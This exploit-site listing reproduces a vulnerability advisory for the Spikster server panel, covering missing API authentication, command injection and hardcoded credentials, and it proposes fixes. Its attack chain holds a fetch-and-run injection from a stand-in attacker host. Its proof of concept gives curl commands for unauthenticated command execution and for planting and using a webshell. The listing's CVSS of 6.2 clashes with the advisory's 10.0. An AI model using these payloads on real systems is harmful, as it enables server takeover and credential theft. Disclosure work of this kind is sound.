Exploit for spikster-auth-bypass-cve

Name: Exploit for spikster-auth-bypass-cve
Rating: 5 (3 reviews)
2026-06-28 | CVSS 6.2
## https://sploitus.com/exploit?id=6C8D14DF-B702-55D0-8ABE-340E544A4D32
# GitHub Security Advisory: Spikster — Complete API Authentication Bypass

---

## Advisory Information

| Field | Value |
|-------|-------|
| **Severity** | Critical |
| **CWE** | CWE-306 (Missing Authentication for Critical Function) |
| **CVSS v3.1** | 10.0 |
| **CVSS Vector** | AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |

---

## Summary

The Spikster server management panel (Laravel-based cPanel alternative) has its **entire API authentication middleware commented out**, allowing unauthenticated attackers to execute arbitrary shell commands on managed servers, read/write/delete arbitrary files, and access all SSH/MySQL credentials.

---

## Vulnerability Details

### Affected Package/Repository

- **Repository:** `spikster/site-manager` (Laravel server management panel)
- **Affected Versions:** Current (all versions audited)
- **Patched Version:** N/A (0-day)
**Commit Hash (audited):** `e1cdf8c4b780c87457b548c38a87982b549e2465`

### Description

**Root Cause:** The `CipiAuth` middleware at `app/Http/Middleware/CipiAuth.php` has its entire authentication logic commented out (lines 24-72). Every API route in `routes/api.php` uses the `api` middleware group, which includes only throttling — NO authentication.

**Three separate auth bypass vectors:**

1. **API routes (`/api/*`):** The `api` middleware group has no auth middleware. All API endpoints return data without authentication.

2. **Shell/Config routes (`/sh/*`, `/conf/*`):** These routes serve shell scripts with embedded passwords. They have **zero middleware** — no auth at all.

3. **File manager routes:** The `FileManagerController` is registered in `api.php` with no auth middleware, allowing arbitrary file read/write/delete on the server filesystem.

The middleware file `CipiAuth.php` lines 24-72:
```php
// THE ENTIRE AUTH HANDLER IS COMMENTED OUT:
// public function handle($request, Closure $next)
// {
//     ... all auth logic removed ...
// }
```

### Attack Chain (Total Server Takeover in 30 seconds):

1. `GET /api/servers` → Returns all servers with IPs, SSH credentials
2. `POST /api/servers/{id}/packages/install` with `{"package": "nginx;curl attacker.com/shell.sh|bash"}` → RCE
3. `POST /files/store` → Write PHP webshell to webroot

### Additional Vulnerabilities in Same Codebase:

- **12 command injection vectors** via unsanitized user input in SSH exec (Site creation, SSL, PHP version change, Node.js setup, MySQL password reset, supervisor config)
- **Hardcoded default credentials:** `admin@localhost / password` in `config/cipi.php`
- **Hardcoded MySQL password** fallback in `DatabaseService.php`
- **Hardcoded panel password** `'Secret_123'` in `ServerController.php`
- **Credentials in GET URL** for PMA auto-login
- **Credentials in process listing** (all SSH jobs pass passwords via `echo | sudo -S`)
- **No CSRF protection**
- **Complete IDOR** — no `user_id` on Site/Server models

---

## Impact

- **Complete server compromise** — attacker can execute arbitrary commands on ALL managed servers
- **Credential theft** — all SSH keys, MySQL passwords, server credentials exposed
- **Arbitrary file read/write/delete** on web server filesystem
- **Data breach** — all customer data, server configurations, database contents
- **Lateral movement** — access to all servers managed by the panel

---

## Proof of Concept

### Step 1: List all managed servers (unauthenticated)
```bash
curl -s http://target.example.com/api/servers
```
Returns JSON with all server IPs, hostnames, SSH credentials.

### Step 2: Execute command on target server (unauthenticated)
```bash
curl -X POST http://target.example.com/api/servers/1/packages/install \
  -H "Content-Type: application/json" \
  -d '{"package": "nginx; id > /var/www/html/pwned.txt"}'
```

### Step 3: Write arbitrary file via File Manager (unauthenticated)
```bash
curl -X POST http://target.example.com/files/store \
  -H "Content-Type: application/json" \
  -d '{"content": {"pathName": "/var/www/html/shell.php"}, "data": ""}'
```

### Step 4: Access webshell
```bash
curl http://target.example.com/shell.php?cmd=whoami
```

---

## Patches / Fix

### Immediate Fix:
```php
// In app/Http/Middleware/CipiAuth.php — UNCOMMENT the auth handler
public function handle($request, Closure $next)
{
    if (!$request->user()) {
        return response()->json(['error' => 'Unauthorized'], 401);
    }
    return $next($request);
}
```

### Additional Required Fixes:
1. Add `escapeshellarg()` to ALL SSH command constructions
2. Remove hardcoded credentials from `config/cipi.php`
3. Add `user_id` foreign key to Site/Server models for IDOR prevention
4. Add CSRF tokens to all state-changing endpoints
5. Never pass credentials via command-line arguments (use stdin or env vars)

---

## Disclosure Timeline

- **2026-06-28:** Vulnerability discovered by Fatullayev Asadbek (Kimdir01)
- **TBD:** Reported to maintainer
- **TBD:** CVE requested
- **TBD:** Advisory published

---

## Credits

- Discovered by: Fatullayev Asadbek | GitHub: Kimdir01
- Independent security researcher

---

## References

- CWE-306: Missing Authentication for Critical Function
- CWE-78: OS Command Injection
- CWE-798: Hardcoded Credentials